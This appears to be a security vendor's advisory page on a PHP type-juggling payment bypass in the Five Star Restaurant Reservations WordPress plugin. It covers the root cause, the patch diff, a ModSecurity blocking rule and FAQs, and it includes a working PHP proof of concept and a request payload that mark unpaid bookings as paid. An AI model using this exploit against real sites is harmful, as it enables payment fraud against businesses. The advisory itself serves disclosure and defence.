What is CVE-2026-6498?

CVE-2026-6498 is a security vulnerability in the Five Star Restaurant Reservations plugin for WordPress, allowing unauthenticated attackers to bypass payment verification. This vulnerability affects versions up to 2.7.16 due to a PHP type juggling issue in the payment verification logic.

Who is affected by this vulnerability?

Any WordPress site using the Five Star Restaurant Reservations plugin version 2.7.16 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Five Star Restaurant Reservations plugin installed on your WordPress site. If it is version 2.7.16 or earlier, your site is vulnerable and should be updated immediately.

How can I fix this vulnerability?

The vulnerability can be fixed by updating the Five Star Restaurant Reservations plugin to version 2.7.17 or later, where the issue has been patched. It is essential to regularly update all WordPress plugins to maintain security.

What does the CVSS score of 5.3 signify?

A CVSS score of 5.3 indicates a medium severity level for this vulnerability. This means that while the vulnerability can be exploited, it requires specific conditions to be met, and the potential impact is moderate.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability allows attackers to mark bookings as paid without actual payments, leading to potential revenue loss for businesses. Although it does not provide access to sensitive data, it undermines the payment system and can cause operational disruptions.

What changes were made in the patched version?

In the patched version 2.7.17, the valid_payment() function was modified to include a check that the stripe_payment_intent_id is not empty and changed the comparison from loose (==) to strict (===). This prevents the type juggling issue that allowed the bypass.

What is a proof of concept (PoC) for this vulnerability?

A proof of concept for CVE-2026-6498 shows how an attacker can exploit the vulnerability by sending a POST request to the AJAX handler with an empty payment_id parameter. This demonstrates how the vulnerability can be exploited in practice.

Is there any sensitive data exposure with this vulnerability?

No, this vulnerability does not expose sensitive data or allow privilege escalation. However, it does enable fraudulent actions that can affect the integrity of the booking system.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until you can apply the patch. Additionally, monitor your bookings closely for any unauthorized changes and implement security measures to restrict access to the AJAX handler.

Where can I find more information about this vulnerability?

More information about CVE-2026-6498 can be found in the official CVE database, security advisories from the plugin developer, and security research articles that analyze the vulnerability and its implications.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-6498: Five Star Restaurant Reservations <= 2.7.16 – Unauthenticated Payment Bypass via PHP Type Juggling in 'payment_id' Parameter (restaurant-reservations)

CVE ID CVE-2026-6498

Plugin restaurant-reservations

Severity Medium (CVSS 5.3)

CWE 345

Vulnerable Version 2.7.16

Patched Version 2.7.17

Disclosed April 28, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6498:

This vulnerability is an unauthenticated payment bypass affecting the Five Star Restaurant Reservations plugin for WordPress, version 2.7.16 and earlier. The flaw allows an attacker to mark a booking with a pending payment status as paid without completing any actual Stripe payment. The vulnerability is rated 5.3 CVSS and is due to a PHP type juggling weakness in the payment verification logic.

The root cause lies in the `valid_payment()` function within `/restaurant-reservations/includes/PaymentGatewayStripe.class.php`, around line 458 of the vulnerable code. This function performs a loose comparison (==) between the attacker-controlled `payment_id` POST parameter and the booking’s `stripe_payment_intent_id` property. The `sanitize_text_field()` function applied to `$_POST[‘payment_id’]` returns an empty string when the POST parameter is absent or empty. On the booking object, if no Stripe payment intent has been created yet (i.e., the JavaScript `create_stripe_pmtIntnt()` call has not been executed), `stripe_payment_intent_id` is null or an empty string. In PHP, the loose comparison `sanitize_text_field(”) == null` evaluates to `true`, bypassing the payment check.

An unauthenticated attacker can exploit this by sending a POST request to the WordPress AJAX handler `admin-ajax.php` with the action `rtb_stripe_pmt_succeed`. The required parameters include a valid booking ID (e.g., `booking_id`) and an empty or omitted `payment_id` parameter. The attacker must target a booking that already exists in the database with a status of ‘payment_pending’. No authentication or nonce is required because the AJAX handler is registered for the `nopriv` (unauthenticated) action. The attack payload is simply `action=rtb_stripe_pmt_succeed&booking_id=[existing-booking-id]&payment_id=`.

The patch changes the return statement in `valid_payment()` on line 458 of the PaymentGatewayStripe.class.php file. The vulnerable code was:
`return sanitize_text_field( $_POST[‘payment_id’] ) == $booking->stripe_payment_intent_id;`
The patched code is:
`return ! empty( $booking->stripe_payment_intent_id ) && sanitize_text_field( $_POST[‘payment_id’] ) === $booking->stripe_payment_intent_id;`
The fix adds two defenses: first, a check that `$booking->stripe_payment_intent_id` is not empty, ensuring a payment intent must have been created; second, it replaces the loose comparison `==` with a strict comparison `===`, preventing any type juggling.

Successful exploitation allows an unauthenticated attacker to convert any existing booking with a ‘payment_pending’ status to a paid or confirmed state without paying. This directly leads to a loss of revenue for the business using the plugin. The attacker does not gain access to sensitive data or escalate privileges beyond marking bookings as paid. However, this undermines the entire payment system, enabling fraudulent reservations and potentially causing operational disruption.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/restaurant-reservations/includes/MailChimp.class.php
+++ b/restaurant-reservations/includes/MailChimp.class.php
@@ -18,6 +18,9 @@

 	public $merge_fields = array();

+	// mcrftbMailChimpRequest
+	public $mc;
+
 	public function __construct() {
 		global $rtb_controller;

--- a/restaurant-reservations/includes/MailChimpRequest.class.php
+++ b/restaurant-reservations/includes/MailChimpRequest.class.php
@@ -71,14 +71,30 @@

 		$url = $this->api_url . $endpoint;

-		$args = array(
-			'headers' => array(
-				'Authorization' => 'MailChimpForRestaurantReservations ' . $this->api_key,
-			),
-		);
+		if ( strpos( $endpoint, 'members' ) !== false ) {

-		if ( !empty( $params ) ) {
-			$args['body'] = $params;
+			$args = array(
+			    'headers' => array(
+			        'Authorization' => 'MailChimpForRestaurantReservations ' . $this->api_key,
+			        'Content-Type'  => 'application/json',
+			    ),
+			);
+
+			if ( !empty( $params ) ) {
+			    $args['body'] = wp_json_encode( $params );
+			}
+		}
+		else {
+
+			$args = array(
+			    'headers' => array(
+			        'Authorization' => 'MailChimpForRestaurantReservations ' . $this->api_key,
+			    ),
+			);
+
+			if ( !empty( $params ) ) {
+			    $args['body'] = $params;
+			}
 		}

 		$args = apply_filters( 'mcfrtb_mailchimp_api_request_args', $args, $endpoint, $method, $params );
--- a/restaurant-reservations/includes/PaymentGatewayStripe.class.php
+++ b/restaurant-reservations/includes/PaymentGatewayStripe.class.php
@@ -455,7 +455,7 @@
    */
   public function valid_payment( $booking ) {

-    return sanitize_text_field( $_POST['payment_id'] ) == $booking->stripe_payment_intent_id;
+    return ! empty( $booking->stripe_payment_intent_id ) && sanitize_text_field( $_POST['payment_id'] ) === $booking->stripe_payment_intent_id;
   }

   /**
--- a/restaurant-reservations/restaurant-reservations.php
+++ b/restaurant-reservations/restaurant-reservations.php
@@ -3,7 +3,7 @@
  * Plugin Name: Five Star Restaurant Reservations - WordPress Booking Plugin
  * Plugin URI: http://www.fivestarplugins.com/plugins/five-star-restaurant-reservations/
  * Description: Restaurant reservations made easy. Accept bookings online. Quickly confirm or reject reservations, send email notifications, set booking times and more.
- * Version: 2.7.16
+ * Version: 2.7.17
  * Author: Five Star Plugins
  * Author URI: https://www.fivestarplugins.com/
  * Text Domain: restaurant-reservations
@@ -58,7 +58,7 @@
 	public function __construct() {

 		// Common strings
-		define( 'RTB_VERSION', '2.7.16' );
+		define( 'RTB_VERSION', '2.7.17' );
 		define( 'RTB_PLUGIN_DIR', untrailingslashit( plugin_dir_path( __FILE__ ) ) );
 		define( 'RTB_PLUGIN_URL', untrailingslashit( plugins_url( basename( plugin_dir_path( __FILE__ ) ), basename( __FILE__ ) ) ) );
 		define( 'RTB_PLUGIN_FNAME', plugin_basename( __FILE__ ) );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6498
# Block unauthenticated AJAX requests that attempt to bypass Stripe payment verification
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261998,phase:2,deny,status:403,chain,msg:'CVE-2026-6498 payment bypass via empty payment_id',severity:'CRITICAL',tag:'CVE-2026-6498'"
  SecRule ARGS_POST:action "@streq rtb_stripe_pmt_succeed" "chain"
    SecRule ARGS_POST:payment_id "@rx ^$" "t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6498 - Five Star Restaurant Reservations <= 2.7.16 - Unauthenticated Payment Bypass via PHP Type Juggling

// Configuration - Change these values
$target_url = 'http://example.com'; // Replace with target WordPress site URL
$booking_id = 1; // Replace with an existing booking ID that has status 'payment_pending'

// Endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Payload: send an empty payment_id to exploit the loose comparison
$post_data = array(
    'action'     => 'rtb_stripe_pmt_succeed',
    'booking_id' => $booking_id,
    'payment_id' => '' // Empty string - triggers PHP type juggling vulnerability
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output result
echo "HTTP Response Code: " . $http_code . "n";
echo "Response Body:n" . $response . "nn";

if ($http_code == 200 && strpos($response, 'success') !== false) {
    echo "[SUCCESS] The payment bypass worked. Booking ID $booking_id has been marked as paid.n";
} else {
    echo "[FAIL] The exploit did not succeed. The site may be patched or the booking ID is invalid.n";
}
?>

Frequently Asked Questions

What is CVE-2026-6498?
Overview of the vulnerability
CVE-2026-6498 is a security vulnerability in the Five Star Restaurant Reservations plugin for WordPress, allowing unauthenticated attackers to bypass payment verification. This vulnerability affects versions up to 2.7.16 due to a PHP type juggling issue in the payment verification logic.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the valid_payment() function using a loose comparison between the attacker-controlled payment_id POST parameter and the booking’s stripe_payment_intent_id property. An attacker can submit an empty payment_id, which evaluates to true in a loose comparison, allowing them to mark a booking as paid without a real payment.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Five Star Restaurant Reservations plugin version 2.7.16 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check for vulnerability, verify the version of the Five Star Restaurant Reservations plugin installed on your WordPress site. If it is version 2.7.16 or earlier, your site is vulnerable and should be updated immediately.
How can I fix this vulnerability?
Recommended actions
The vulnerability can be fixed by updating the Five Star Restaurant Reservations plugin to version 2.7.17 or later, where the issue has been patched. It is essential to regularly update all WordPress plugins to maintain security.
What does the CVSS score of 5.3 signify?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity level for this vulnerability. This means that while the vulnerability can be exploited, it requires specific conditions to be met, and the potential impact is moderate.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability allows attackers to mark bookings as paid without actual payments, leading to potential revenue loss for businesses. Although it does not provide access to sensitive data, it undermines the payment system and can cause operational disruptions.
What changes were made in the patched version?
Details of the fix
In the patched version 2.7.17, the valid_payment() function was modified to include a check that the stripe_payment_intent_id is not empty and changed the comparison from loose (==) to strict (===). This prevents the type juggling issue that allowed the bypass.
What is a proof of concept (PoC) for this vulnerability?
Demonstration of the issue
A proof of concept for CVE-2026-6498 shows how an attacker can exploit the vulnerability by sending a POST request to the AJAX handler with an empty payment_id parameter. This demonstrates how the vulnerability can be exploited in practice.
Is there any sensitive data exposure with this vulnerability?
Data security implications
No, this vulnerability does not expose sensitive data or allow privilege escalation. However, it does enable fraudulent actions that can affect the integrity of the booking system.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the plugin until you can apply the patch. Additionally, monitor your bookings closely for any unauthorized changes and implement security measures to restrict access to the AJAX handler.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-6498 can be found in the official CVE database, security advisories from the plugin developer, and security research articles that analyze the vulnerability and its implications.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations